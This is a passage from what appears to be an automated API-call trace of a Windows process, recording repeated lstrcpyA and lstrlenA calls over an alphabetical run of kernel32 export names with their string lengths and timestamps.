lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.817] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.817] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.817] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.817] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.817] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.817] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.817] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.817] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.817] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.817] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.817] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.817] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.817] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.817] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.817] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.818] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.818] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.818] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.818] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.818] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.818] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.818] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.818] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.818] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.818] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.818] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.818] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.818] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.818] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.818] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.818] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.818] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.818] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.818] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.819] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.819] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.819] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.819] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.819] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.819] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.819] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.819] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.819] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.819] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.819] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.819] lstrlenA (lpString="BEEP") returned 4 [0083.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.819] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.819] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.819] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.819] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.819] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.819] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.819] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.820] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.820] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.820] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.820] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.820] lstrlenA (lpString="CANCELIO") returned 8 [0083.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.820] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.820] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.820] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.820] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.820] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.820] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.820] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.820] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.820] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.820] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.820] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.820] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.820] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.821] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.821] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.821] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.821] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.821] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.821] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.821] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.821] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.821] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.821] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.821] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.821] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.821] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.821] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.821] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.821] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.821] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.821] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.822] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.822] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.822] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.822] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.822] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.822] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.822] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.822] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.822] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.822] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.822] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.822] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.822] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.822] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.822] lstrlenA (lpString="COPYFILEA") returned 9 [0083.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.822] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.822] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.822] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.822] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.823] lstrlenA (lpString="COPYFILEW") returned 9 [0083.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.823] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.823] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.823] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.823] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.823] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.823] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.823] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.823] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.823] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.823] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.823] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.823] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.823] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.823] lstrcpyA (in: 